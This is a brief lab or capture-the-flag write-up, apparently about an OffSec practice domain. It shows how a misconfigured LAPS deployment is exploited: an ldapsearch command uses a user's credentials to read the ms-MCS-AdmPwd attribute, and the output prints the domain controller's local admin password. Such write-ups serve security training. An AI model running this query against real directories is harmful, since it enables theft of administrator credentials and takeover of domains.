Misconfigured LDAP
Exploiting misconfigured LAPS service.
C:\Program Files\LAPS>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0A26-9DC1
Directory of C:\Program Files\LAPS
11/03/2020 10:59 PM <DIR> .
11/03/2020 10:59 PM <DIR> ..
09/22/2016 09:02 AM 64,664 AdmPwd.UI.exe
09/22/2016 09:02 AM 33,952 AdmPwd.Utils.dll
11/03/2020 10:59 PM <DIR> CSE
2 File(s) 98,616 bytes
3 Dir(s) 13,020,606,464 bytes free$ ldapsearch -x -h 192.168.99.122 -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
# extended LDIF
#
# LDAPv3
# base <dc=hutch,dc=offsec> with scope subtree
# filter: (ms-MCS-AdmPwd=*)
# requesting: ms-MCS-AdmPwd
#
# HUTCHDC, Domain Controllers, hutch.offsec
dn: CN=HUTCHDC,OU=Domain Controllers,DC=hutch,DC=offsec
ms-Mcs-AdmPwd: k)zu03O#915M7K
# search reference
ref: ldap://ForestDnsZones.hutch.offsec/DC=ForestDnsZones,DC=hutch,DC=offsec
# search reference
ref: ldap://DomainDnsZones.hutch.offsec/DC=DomainDnsZones,DC=hutch,DC=offsec
# search reference
ref: ldap://hutch.offsec/CN=Configuration,DC=hutch,DC=offsec
# search result
search: 2
result: 0 Success
# numResponses: 5
# numEntries: 1
# numReferences: 3Last updated